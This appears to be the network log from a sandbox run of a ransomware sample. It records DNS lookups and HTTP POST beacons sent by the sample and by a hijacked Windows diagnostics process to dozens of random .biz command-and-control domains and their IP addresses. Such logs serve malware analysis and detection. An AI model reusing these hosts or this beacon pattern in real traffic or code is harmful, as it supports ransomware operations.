Set-Cookie: btst=77689a3de9266d2fe117b12cc9910237|191.101.209.39|1717923900|1717923900|0|1|0; path=/; domain=.fjumtfnz.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cvgrf.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/eucpto

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /eucpto HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8caf307806d02785e99d292cf23bf9eb|191.101.209.39|1717923900|1717923900|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
POST

http://hlzfuyy.biz/gycoalpdktcnwy

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /gycoalpdktcnwy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=648c8b45f9b49d96dfe6475923706f96|191.101.209.39|1717923900|1717923900|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

npukfztj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
DNS

npukfztj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/uxokm

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /uxokm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d8f0d829f9854bb6b427285c3cc2c4d1|191.101.209.39|1717923901|1717923901|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rffxu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://rffxu.biz/xgnhtjgvps

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /xgnhtjgvps HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=86b1238099bf48f7b42f44e02d2ff3ab|191.101.209.39|1717923901|1717923901|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

44.208.124.139

przvgke.biz

IN A

34.193.97.35

przvgke.biz

IN A

54.157.24.8
DNS

przvgke.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

44.208.124.139

przvgke.biz

IN A

34.193.97.35

przvgke.biz

IN A

54.157.24.8
POST

http://przvgke.biz/culudnswhdouf

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.208.124.139:80

Request

POST /culudnswhdouf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
DNS

cikivjto.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

cikivjto.biz

IN A

Response

cikivjto.biz

IN A

44.213.104.86
POST

http://cikivjto.biz/vafge

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /vafge HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cikivjto.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ab74567b2a9b380cf13d167528b5ba89|191.101.209.39|1717923901|1717923901|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://przvgke.biz/lff

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.208.124.139:80

Request

POST /lff HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
DNS

qncdaagct.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

34.218.204.173
POST

http://qncdaagct.biz/qvbngsmdvnpt

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.218.204.173:80

Request

POST /qvbngsmdvnpt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qncdaagct.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2c557aee529858f6ef7863d4531390c4|191.101.209.39|1717923901|1717923901|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zlenh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
DNS

knjghuig.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/ukabixremwjuvnr

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /ukabixremwjuvnr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:05:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0b7bf9b3d726911867045fb41f03fbf1|191.101.209.39|1717923902|1717923902|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

shpwbsrw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

shpwbsrw.biz

IN A

Response

shpwbsrw.biz

IN A

107.178.223.183

shpwbsrw.biz

IN A

104.155.138.21
POST

http://shpwbsrw.biz/idfgyrdvb

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

107.178.223.183:80

Request

POST /idfgyrdvb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
DNS

uhxqin.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response

54.244.188.177:80

http://pywolwnvd.biz/i

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/i

HTTP Response

200
54.244.188.177:80

http://pywolwnvd.biz/bdvi

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/bdvi

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/prpswuqacbwel

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ssbzmoy.biz/prpswuqacbwel

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/gjmekjil

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ssbzmoy.biz/gjmekjil

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/v

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://cvgrf.biz/v

HTTP Response

200
107.178.223.183:80

http://cvgrf.biz/jpgfpgmjpg

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.6kB
290 B
7
6

HTTP Request

POST http://cvgrf.biz/jpgfpgmjpg

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/xo

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://npukfztj.biz/xo

HTTP Response

200
54.157.24.8:80

http://przvgke.biz/dbqwptpllevka

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/dbqwptpllevka
54.157.24.8:80

http://przvgke.biz/mlk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
252 B
6
6

HTTP Request

POST http://przvgke.biz/mlk
18.141.10.107:80

http://knjghuig.biz/mchkkwhcopk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://knjghuig.biz/mchkkwhcopk

HTTP Response

200
82.112.184.197:80

lpuegx.biz

DiagnosticsHub.StandardCollector.Service.exe

260 B
5
44.221.84.105:80

http://npukfztj.biz/jquwruktof

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://npukfztj.biz/jquwruktof

HTTP Response

200
54.157.24.8:80

http://przvgke.biz/ocmvd

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/ocmvd
54.157.24.8:80

http://przvgke.biz/qtfefev

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/qtfefev
18.141.10.107:80

http://knjghuig.biz/hyy

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://knjghuig.biz/hyy

HTTP Response

200
82.112.184.197:80

lpuegx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

260 B
5
82.112.184.197:80

lpuegx.biz

DiagnosticsHub.StandardCollector.Service.exe

260 B
5
82.112.184.197:80

lpuegx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

DiagnosticsHub.StandardCollector.Service.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

DiagnosticsHub.StandardCollector.Service.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

260 B
5
44.200.43.61:80

http://xlfhhhm.biz/sayiiucrcw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://xlfhhhm.biz/sayiiucrcw

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/qmritt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ifsaia.biz/qmritt

HTTP Response

200
3.237.86.197:80

http://saytjshyf.biz/vnfosmfrakk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://saytjshyf.biz/vnfosmfrakk

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/pgvkv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
667 B
6
6

HTTP Request

POST http://vcddkls.biz/pgvkv

HTTP Response

200
54.157.24.8:80

http://fwiwk.biz/vajxnkrmpri

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://fwiwk.biz/vajxnkrmpri
54.157.24.8:80

http://fwiwk.biz/aoofxoeugctqc

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
172 B
4
4

HTTP Request

POST http://fwiwk.biz/aoofxoeugctqc
34.246.200.160:80

http://tbjrpv.biz/tofitmhf

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://tbjrpv.biz/tofitmhf

HTTP Response

200
54.80.154.23:80

http://deoci.biz/aedldydumworsclk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://deoci.biz/aedldydumworsclk

HTTP Response

200
208.100.26.245:80

http://gjogvvpsf.biz/hnqkj

http

DiagnosticsHub.StandardCollector.Service.exe

8.1kB
5.0kB
17
14

HTTP Request

POST http://gytujflc.biz/xxulvwpkxxk

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/tc

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/aucf

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/ddnhuqcu

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/e

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/hnqkj

HTTP Response

404
13.251.16.150:80

http://qaynky.biz/qhofdfxipetonn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://qaynky.biz/qhofdfxipetonn

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/lph

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/lph

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/gldvgpktuk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://dwrqljrr.biz/gldvgpktuk

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/qshoan

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://nqwjmb.biz/qshoan

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/rpibkyg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://ytctnunms.biz/rpibkyg

HTTP Response

200
165.160.13.20:80

http://myups.biz/f

http

DiagnosticsHub.StandardCollector.Service.exe

2.8kB
708 B
9
9

HTTP Request

POST http://myups.biz/ntehlksmceccpt

HTTP Response

200

HTTP Request

POST http://myups.biz/f

HTTP Response

200
54.244.188.177:80

http://oshhkdluh.biz/jrdw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://oshhkdluh.biz/jrdw

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/qawiqhpkxlamotxu

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://jpskm.biz/qawiqhpkxlamotxu

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/vogxbeexnwh

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/vogxbeexnwh

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/ouwdsfb

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://wllvnzb.biz/ouwdsfb

HTTP Response

200
54.80.154.23:80

http://gnqgo.biz/arakrmgfxmkujx

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://gnqgo.biz/arakrmgfxmkujx

HTTP Response

200
3.237.86.197:80

http://jhvzpcfg.biz/fdskdesnk

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/fdskdesnk

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/f

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
668 B
6
6

HTTP Request

POST http://acwjcqqv.biz/f

HTTP Response

200
44.200.43.61:80

http://xlfhhhm.biz/fvm

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://xlfhhhm.biz/fvm

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/fqd

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ifsaia.biz/fqd

HTTP Response

200
44.213.104.86:80

http://vyome.biz/ujatdwxsqca

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://vyome.biz/ujatdwxsqca

HTTP Response

200
54.80.154.23:80

http://yauexmxk.biz/ojqpg

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://yauexmxk.biz/ojqpg

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/kgmwamuuuwcb

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://iuzpxe.biz/kgmwamuuuwcb

HTTP Response

200
3.237.86.197:80

http://saytjshyf.biz/f

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://saytjshyf.biz/f

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/bsgabfqi

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
667 B
6
6

HTTP Request

POST http://vcddkls.biz/bsgabfqi

HTTP Response

200
13.251.16.150:80

http://sxmiywsfv.biz/p

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://sxmiywsfv.biz/p

HTTP Response

200
54.157.24.8:80

http://fwiwk.biz/qc

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.4kB
172 B
4
4

HTTP Request

POST http://fwiwk.biz/qc
54.157.24.8:80

http://fwiwk.biz/snkdddkd

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.4kB
172 B
4
4

HTTP Request

POST http://fwiwk.biz/snkdddkd
34.246.200.160:80

http://tbjrpv.biz/ojgjwowcyffpqib

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://tbjrpv.biz/ojgjwowcyffpqib

HTTP Response

200
54.80.154.23:80

http://deoci.biz/nhdtgal

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://deoci.biz/nhdtgal

HTTP Response

200
208.100.26.245:80

http://gjogvvpsf.biz/qnrpymilrm

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

8.3kB
5.0kB
17
14

HTTP Request

POST http://gytujflc.biz/sa

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/owqtsjkyu

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/o

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/lhaaa

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/tffotk

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/qnrpymilrm

HTTP Response

404
34.211.97.45:80

http://vrrazpdh.biz/dilmjf

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
660 B
6
6

HTTP Request

POST http://vrrazpdh.biz/dilmjf

HTTP Response

200
13.251.16.150:80

http://qaynky.biz/c

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://qaynky.biz/c

HTTP Response

200
34.218.204.173:80

http://ftxlah.biz/upw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
666 B
6
6

HTTP Request

POST http://ftxlah.biz/upw

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/adycfbqeraxyvd

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://typgfhb.biz/adycfbqeraxyvd

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/f

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/f

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/kyhfsklyycac

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
668 B
6
6

HTTP Request

POST http://dwrqljrr.biz/kyhfsklyycac

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/kvulftralemdso

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://esuzf.biz/kvulftralemdso

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/pmjbvham

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
658 B
6
6

HTTP Request

POST http://nqwjmb.biz/pmjbvham

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/uvyexrirkvn

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/uvyexrirkvn

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/htut

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
661 B
6
6

HTTP Request

POST http://ytctnunms.biz/htut

HTTP Response

200
44.213.104.86:80

http://qpnczch.biz/ovpat

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://qpnczch.biz/ovpat

HTTP Response

200
165.160.13.20:80

http://myups.biz/nhquxflcfbjhxaa

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

2.9kB
708 B
9
9

HTTP Request

POST http://myups.biz/uxpbqxkwona

HTTP Response

200

HTTP Request

POST http://myups.biz/nhquxflcfbjhxaa

HTTP Response

200
3.254.94.185:80

http://brsua.biz/ummkdcoywqbiv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
665 B
6
6

HTTP Request

POST http://brsua.biz/ummkdcoywqbiv

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/jpir

http

DiagnosticsHub.StandardCollector.Service.exe

1.4kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/jpir

HTTP Response

404
54.244.188.177:80

http://oshhkdluh.biz/xrkxc

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
669 B
6
6

HTTP Request

POST http://oshhkdluh.biz/xrkxc

HTTP Response

200
44.200.43.61:80

http://oflybfv.biz/diynarecblkgkv

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
659 B
6
6

HTTP Request

POST http://oflybfv.biz/diynarecblkgkv

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/dkpksqhgfvviycx

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
657 B
6
6

HTTP Request

POST http://yhqqc.biz/dkpksqhgfvviycx

HTTP Response

200
44.200.43.61:80

http://mnjmhp.biz/uktdloeyeuw

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
666 B
6
6

HTTP Request

POST http://mnjmhp.biz/uktdloeyeuw

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/qtsasvnnwkmpcitg

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
657 B
6
6

HTTP Request

POST http://jpskm.biz/qtsasvnnwkmpcitg

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/lwogmha

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
669 B
6
6

HTTP Request

POST http://opowhhece.biz/lwogmha

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/bydyptt

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
658 B
6
6

HTTP Request

POST http://jdhhbs.biz/bydyptt

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/vhuvvbcimdcq

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
660 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/vhuvvbcimdcq

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/nogooyab

http

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

1.5kB
659 B
6
6

HTTP Request

POST http://wllvnzb.biz/nogooyab

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/pktmwgvm

http

DiagnosticsHub.StandardCollector.Service.exe

1.5kB
661 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/pktmwgvm

HTTP Response

200
18.141.10.107:80

